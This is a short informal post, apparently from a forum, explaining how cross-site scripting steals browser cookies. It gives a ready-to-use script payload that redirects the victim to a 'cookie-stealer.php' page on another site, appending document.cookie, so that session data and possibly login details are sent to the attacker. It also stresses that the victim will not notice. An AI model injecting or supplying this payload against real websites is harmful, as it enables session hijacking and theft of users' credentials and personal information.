one way is to grab the cookie and decode the stuff in the cookie to get username,password, other personal info of the [erson currently logged in.
<script>window.location='somesite/cookie-stealer.php?cookie='+document.cookie</script>
and then the person redirects you to some other page/site. you wont even know that ur cookie was stolen, which might have lots of sensitive info.